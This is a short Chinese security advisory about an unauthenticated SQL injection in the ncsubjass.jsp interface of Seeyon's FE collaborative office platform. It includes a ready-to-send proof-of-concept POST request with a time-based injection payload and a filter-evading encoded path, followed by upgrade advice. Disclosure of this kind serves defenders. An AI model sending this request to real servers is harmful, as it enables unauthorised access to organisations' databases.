0x00 漏洞编号
0x01 危险等级
0x02 漏洞概述
致远互联FE协作办公平台是一款为企业提供全方位协同办公解决方案的产品。它集成了多个功能模块,旨在帮助企业实现高效的只团队协作、信息共享和文档管理。
0x03 漏洞详情
**漏洞类型:**SQL注入
**影响:**获取敏感信息
**简述:**致远互联FE协作办公平台的ncsubjass.jsp接口存在SQL注入漏洞,未经身份验证的攻击者可以通过此漏洞获取数据库敏感信息。
0x04 影响版本
0x05 POC
`POST /fenc/ncsubjass.j%73p HTTP/1.1``Host: {{Hostname}}``User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36``Content-Type: application/x-www-form-urlencoded` `subjcode=';WAITFOR DELAY '0:0:5'--`
仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者及发布者不承担任何法律及连带责任。
0x06 修复建议
目前官方已发布漏洞修复版本,建议用户升级到安全版本******:******